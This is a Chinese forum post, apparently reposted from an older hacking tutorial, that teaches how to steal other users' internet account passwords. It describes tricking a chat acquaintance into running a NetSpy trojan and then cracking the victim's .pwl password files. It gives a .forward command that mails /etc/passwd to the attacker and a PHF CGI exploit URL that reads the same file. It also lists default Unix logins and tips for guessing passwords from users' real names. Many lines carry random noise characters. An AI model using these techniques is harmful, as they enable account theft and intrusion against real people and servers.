找回密码
 注册

QQ登录

只需一步,快速开始

如何得到别人的上网帐号和密码

[复制链接]
发表于 2011-1-12 21:03:35 | 显示全部楼层 |阅读模式
如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
( H) j/ M2 |% e" M, F. o方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。
2 K8 i( G; i: P' s  a, g7 v优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......; B0 g$ d# E+ k5 y" \, r
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
0 s) C3 k( d* S6 y- X提示:先问清你的目标和你是不是在一个城市。- i5 U( A+ m2 z0 D8 g
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。- L8 z3 J& Y6 b' H% F; n
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。( I6 r; S. P7 H, N  V$ m( ]3 V
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。1 S; Y/ s9 I9 [, K: c
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客
; X* e# [( k  `) W3 }# L优点:没什么优点
- w- k# V8 P& W5 m缺点:要具体情况具体对待,太麻烦/ ~1 R+ {/ V8 @* m8 o/ P( A
提示:平时多多留神。1 \0 Z. B' u7 {2 n# Q! o
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net2 y+ q- P2 M3 A& L
密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。/ f5 W0 p8 P. ]
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破7 ?/ u9 |5 Y8 T' ~" O
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。8 u" C9 N. h  w, s( P3 c
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
: n% P  a1 c, _# m) ^1 A; P缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。6 o  L& c3 W7 }( R# G9 x- d
由于介绍此类的教学文章比较多,我就不班门弄斧了。
% s# v% e8 o% h! k1 G$ Q6 I/ T8 i
+ f) t  a" h/ j/ b哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。1 ?' ^9 F" ]. i9 B8 e7 X. c
只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。! S! g% q- v& ?
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
0 G1 @  r: m2 `
$ h9 V6 a5 B( ^7 W9 P------------------------------
# L# Q5 W4 M4 k. I
# }0 i7 n2 b5 f: `XXX,你好(XX是你在表格上填的名字)
) ~# H$ f/ b& s2 D9 _你在XX热线的主页空间已开通) N% |. H# E8 W4 i
帐户名:XXX 密码:11' F( \+ J( E$ {8 F* N% Y4 @
-----------XX热线, y" a* s+ N9 T. q& D3 H. q! g: O
电话:XXXX-XXXXXXXX
5 a+ d6 O0 y( t& b& \------------------------------
1 V  A4 t, W1 l9 g9 ]2 K% w* `3 h8 d" s& l
好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
0 w% g1 E6 E/ ~& F开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。& X$ q: G1 R0 \/ B. U* w9 j! P
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!+ I. E( d: I0 ~+ s1 J8 h4 T
  
+ E% e0 U% g5 Z* R& Y8 \  a, u$ `# Z1 H  W
                           如何获得第一个帐号2 Z) {0 m3 t* a7 b' }- D$ R' }3 X

) r1 S% h) e! S3 x3 `我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
* g5 w/ ]" K: H0 \" R4 g( H0 a/ p" g' o$ P6 j
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。; u: e5 [  j" M- N
. K) y, O6 G% z- A% E
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
8 _% M0 K) [, L" e# R: n0 n4 x( o" F
以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
2 T) i8 s' z# l3 X& E/ T, b$ |( M2 _# ~5 b( m5 _
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!) \# W+ u. G* r9 W3 ?- Q+ ~$ d
; g! M" {: N' \' a4 [% l/ t
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:; b) t" w7 D/ `0 g4 M. p

! a  k" ^5 w- P- O: ^0 M3 ]7 |帐号     密码/ v2 d4 i# g7 P- {( j
----------- ----------------
+ X/ ~9 j* V' x" f  Q% vroot    root
9 e; ]& p3 ]* d9 Bsys     sys/system/bin
$ i2 Y- g% W, _$ Z. Wbin     sys/bin& G3 _+ K* @- _' D( n
mountfsys  mountfsys
% u1 Q% `& D$ m' S+ zadm     adm
1 Q! v% a; X' L" l0 F  @* \7 H/ ouucp    uucp
( Z9 C# x9 ^1 mnuucp    anon9 A7 @1 q% v9 ~5 J( b/ S
anon    anon4 f. R; V5 F/ d5 B7 ?
user    user* E5 l- g. I6 f4 W1 D, n# m
games    games0 c, f- W# }) r; g% {
install   install
4 Z0 t% X% V) F* @0 ?( U* freboot   给 "command login" 用的
2 I" h& [/ b- g2 V  Ydemo    demo
( K/ K; [6 d) B6 v" b  Tumountfsys umountfsys- t5 f2 ?! q5 P% ~- i
sync     sync
, m3 k$ h% O! a7 P- ?admin    admin. u0 L6 I1 [  o1 H4 F
guest    guest/ O: I: u! V( Y& g# C
daemon   daemon
/ x! n: r" N3 n; C4 a( Y( @________________________________________________________________6 O$ w+ O- D& a/ V- d+ N9 c0 Q. f3 {

! o8 A1 C+ ^/ l; ~, c( W; w2 z有些管理员忘记把他们改掉,那你就发财了!; y- E4 `& m  G" @+ B
6 Q, f3 Y( G+ Y& Y; |
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
0 |0 N) \8 z7 _% d# v" R  k2 P  @6 z9 |0 K
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
% u  l  z( t  c5 g3 k" ^1 A* G6 P' x0 V. t" u) C" x
.........8 d0 ?; c+ r4 M, \

; e8 z) E0 t: I2 g5 w* m! z9 D2 ~6 Jxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
) F% C- N$ m0 T8 o, \2 k' n" l/ l2 w2 `) Z
qingyuan:x:275:50::/usr/qingyuan:/bin/sh8 F# M$ A# w  G  ^/ _* o
( G/ N/ z' d! F: T0 f
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh4 d& d" E4 _- _: F& `* P3 K
/ q' o3 F1 q/ g* c4 D
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh- L' g6 Y8 {/ D5 \
5 U/ j2 t7 B' d& q9 y8 F4 M
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh4 L6 V1 b2 Y' B; }& N. q

: Q+ Z) |/ l0 E: V( Bbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh$ T; c" D8 U. X1 M7 E  H

2 a9 [+ o. y. }0 u$ itide:x:301:50:Wang XinYi:/usr/tide:/bin/sh3 C; f$ v% \1 [$ A0 z4 x6 i
( Q5 e3 s5 P  X! C  d; Z/ J
............1 Z7 u6 y' p7 z5 P1 i8 k

: b- Y# k+ t7 `) W, P: [3 Y这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.
: N3 [6 s5 n2 N% Y, }( ^+ P/ \1 z6 [, K7 }; `6 Z
如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.) m5 j& p7 z. E

- r  E$ C( D! P9 d0 P! B. c. a6 B: F当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的./ `6 K9 e9 ?( i- {

5 @% X- R% _5 n' `' _3 @如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
4 s( ~2 S. r% e  m# B. A
* w# V6 ]9 R6 {4 d  L; {. W最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.
% K( j0 ?( ^2 r' K! v; b
: P# ]" y6 r& D6 t- l# F: D8 `  F; @你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.
5 [. l0 Z2 g2 G8 K( k" v3 f9 }* w
4 L2 [) P) @" Z* r7 Q' N, ?7 N
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-12-16 20:02

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表